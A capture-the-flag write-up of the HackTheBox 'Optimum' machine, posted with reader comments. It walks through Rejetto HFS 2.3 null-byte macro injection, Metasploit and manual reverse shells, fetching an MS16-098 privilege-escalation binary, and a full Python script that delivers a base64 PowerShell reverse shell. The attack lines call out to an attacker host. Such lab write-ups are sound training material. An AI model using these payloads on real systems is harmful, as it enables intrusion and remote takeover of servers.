Optimum write-up by Alamot

Enumeration

Port scanning

We scan the full range of TCP ports using masscan (Why masscan? Because it’s faster than nmap)

$ sudo masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2017-10-10 09:58:16 GMT

 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 10.10.10.8

We found TCP port 80 open. Let’s explore it using nmap:

$ sudo nmap -A -p80 10.10.10.8

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-10 13:10 EEST
Nmap scan report for 10.10.10.8
Host is up (0.086s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We scan only the 1000 most common UDP ports using nmap because UDP scanning it’s very slow.

$ sudo nmap -sU --top-ports 1000 10.10.10.8

Nmap scan report for 10.10.10.8
Host is up (0.075s latency).
All 1000 scanned ports on 10.10.10.8 are open|filtered

Exploitation

So, we have found that Rejetto HttpFileServer 2.3 is running on TCP port 80. Let’s see if there are some exploits for it:

$ searchsploit rejetto 2.3 -w
----------------------------------------------------------------------- --------------------------------------------
 Exploit Title                                                         |  URL
----------------------------------------------------------------------- --------------------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload         | https://www.exploit-db.com/exploits/30850/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)    | https://www.exploit-db.com/exploits/34668/
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)    | https://www.exploit-db.com/exploits/39161/
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Executi | https://www.exploit-db.com/exploits/34852/
----------------------------------------------------------------------- --------------------------------------------

Nice! There are some RCE exploits! :smiley:

An issue exists due to a poor regex in the file ParserLib.pas

function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, ‘{[.:]|[.:]}||’, ‘m!’, ofs) end;

It will not handle null byte:

http://localhost:80/?search=%00{.exec|cmd.} 

So the above request will stop regex from parsing macro, macro will be executed and remote code injection will happen.

The exploit basically allow you to run commands like this:

http://10.10.10.8/?search=%00{.exec|C:\windows\system32\cmd.exe /c echo hello > test.}

You can also upload/save a file like that:

http://10.10.10.8/?search=%00{.save|fullpath\filename|data.}

Using Metasploit

$ msfconsole
msf > search name:rejetto

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Rejetto HttpFileServer Remote Command Execution

msf > use exploit/windows/http/rejetto_hfs_exec 
msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(rejetto_hfs_exec) > set RPORT 80 
msf exploit(rejetto_hfs_exec) > set SRVHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set SRVPORT 60000  
msf exploit(rejetto_hfs_exec) > info

  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  20               no        Seconds to wait before terminating web server
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      10.10.10.8       yes       The target address
  RPORT      80               yes       The target port (TCP)
  SRVHOST    10.10.15.150     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    60000            yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The path of the web application
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpset
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.15.150
msf exploit(rejetto_hfs_exec) > set LPORT 60001
msf exploit(rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.150:60001 
[*] Using URL: http://10.10.15.150:60000/uT3OPJWDAW7b3s
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /uT3OPJWDAW7b3s
[*] Sending stage (205379 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.15.150:60001 -> 10.10.10.8:49264) at 2017-10-10 13:44:11 +0300
[!] Tried to delete %TEMP%\IJOurNACYIxzs.vbs, unknown result
[*] Server stopped.

Now we’ve got a low privilege shelll as user Kostas:

C:\Users\kostas\Desktop> whoami
OPTIMUM\kostas

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 97
Meterpreter     : x64/windows

Privilege Escalation

Let’s search for privilege escalation exploits:

$ git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
$ cd Windows-Exploit-Suggester/
$ python2 windows-exploit-suggester.py --update

We feed in windows-exploit-suggester.py an input file that contains the output from the ‘systeminfo’ command:

meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"

(Yes I know that ‘execute’ has a separate parameter -a to pass the arguments :P. But it also works like that and this scheme is actually clearer. You can also run ‘shell’ and execute ‘systeminfo > systeminfo.txt’. It’s the same thing.)

meterpreter > download systeminfo.txt

$ cat systeminfo.txt
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ££
System Boot Time:          16/10/2017, 9:20:08 ££
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 2.556 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 3.303 MB
Virtual Memory: In Use:    2.200 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

I use the --quiet option to get more compact results. If you want to get more info like links for the exploits remove it:

$ python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ISO-8859-2)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

Quite a few exploits. I tried some and I know that the 2nd one (MS16-098) works. The 6th one (MS16-032) works too but it’s a pain in the ■■■ if you don’t set the correct architecture from start to end. Even if you have the correct architecture -in some metasploit configurations- this exploit doesn’t work correctly.

We download the -less troublesome, more reliable- exploit “Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)” from here: Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) - Windows_x86-64 local Exploit

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
meterpreter > upload 41020.exe
meterpreter > shell
C:\Users\kostas\Desktop>41020.exe

[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017

Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami

nt authority\system :D

Without Metasploit

(Look Mom! No metasploit! :stuck_out_tongue: )

We download the python script from here:

Usage is : python exploit.py RHOST RPORT
Don’t forget to change the Local IP address and Port number inside the script.

We need to host netcat (http://attackers_ip:80/nc.exe) using a web server.

$ mkdir http && cd http
$ wget https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/exe/nc.exe
$ sudo python2 -m SimpleHTTPServer 80
$ nc -lvp 60001

Make sure you have changed the local IP and port inside the script and run:

$ python2 39161.py 10.10.10.8 80 

listening on [any] 60001 ...
10.10.10.8: inverse host lookup failed: 
connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49216
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>

$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe

C:\Users\kostas\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
C:\Users\kostas\Desktop> 41020.exe

[+] Trigerring Exploit.
Done filling.
GetBitmapBits Result. 1000
index: 1017

Gh04 header:
0000bc234768303431f27d92c8af0d58
Gh05 header:
bc003c23476830350000000000000000
Previous page Gh04 (Leaked address):
4050477101f9ffff
Pvsca0:
305e477101f9ffff

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop> whoami

nt authority\system :D

Using a Powershell payload

Do we really need to upload nc.exe? Not really. We have powershell on the box.

#!/usr/bin/env python2
# Author: Alamot
import sys
import urllib, urllib2
from base64 import b64encode

if (len(sys.argv) < 5):
    print("usage: <RHOST> <RPORT> <LHOST> <LPORT>")
    exit()

RHOST = sys.argv[1]
RPORT = sys.argv[2]
LHOST = sys.argv[3]
LPORT = sys.argv[4]

print("RHOST="+RHOST+" RPORT="+RPORT+" LHOST="+LHOST+" LPORT="+LPORT+'\n')

payload = "$client = New-Object System.Net.Sockets.TCPClient('"+LHOST+"',"+LPORT+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

print(payload+'\n')

b64enc_command = b64encode(payload.encode('UTF-16LE')).replace('+','%2b')

url = "http://"+RHOST+":"+RPORT+"/?search=%00{.exec%7CC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe%20-EncodedCommand%20"+b64enc_command+".}"

print(url)
response = urllib2.urlopen(url)
print("\nSTATUS: "+str(response.getcode()))

Let’s run the above python script.

$ nc -lvp 60002
listening on [any] 60002 ...

$ python send_powershell_payload.py 10.10.10.8 80 LHOST 60002

connect to [10.10.15.150] from (UNKNOWN) [10.10.10.8] 49258
PS C:\Users\kostas\Desktop> 

I really like that python wrapper for the nishang one-liner. May have to steal the idea and make it a bit more generic. A lot quicker than modifying files and typing out the IEX ■■■■ every time.

@alamot your writeups are really awesome, keep up the good work :+1:

@ippsec said:
I really like that python wrapper for the nishang one-liner. May have to steal the idea and make it a bit more generic. A lot quicker than modifying files and typing out the IEX ■■■■ every time.

Yeah that’s exactly what I was thinking. Congrats @alamot

This is by far the best Write-up I’ve read ! Awesome @alamot

@alamot - Really good Write-up! Good work!

The link to download exploit “Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)” has been changed. The latest link is https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe